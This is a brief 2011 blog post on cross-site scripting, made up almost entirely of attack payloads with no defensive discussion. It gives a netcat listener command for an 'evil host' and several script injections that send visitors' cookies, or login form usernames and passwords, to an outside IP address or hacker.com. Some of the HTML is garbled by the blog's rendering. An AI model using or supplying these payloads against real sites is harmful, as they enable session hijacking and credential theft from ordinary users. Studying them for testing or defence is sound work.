XSS (Cross Site Scripting)

Posted on 10. January 2011 by fsormok

listener on evil host:

nc -l -p 80

example script on attacked server:

1
 <script>alert(document.cookie)</script>
  • Example 1
1
 &lt;script&gt;document.write(\'&lt;img src=<a title="http://195.225.45.220/\'" href="http://195.225.45.220/%5C%27" rel="nofollow">http://195.225.45.220/\'</a> + document.cookie + \'&gt;\')&lt;/script&gt;
  • Example 2
1
 &lt;script&gt;(new Image).src="<a title="http://195.225.45.220/c.php?c=" href="http://195.225.45.220/c.php?c=" rel="nofollow">http://195.225.45.220/c.php?c=</a>" + escape(document.cookie)&lt;/script&gt;
  • Example 3
1
 &lt;script&gt;(new Image).src='<a title="http://www.hacker.com/'" href="http://www.hacker.com/%27" rel="nofollow">http://www.hacker.com/'</a> + document.forms(1).login.value + ':' + document.forms(1).password.value&lt;/script&gt;
This entry was posted in Security. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.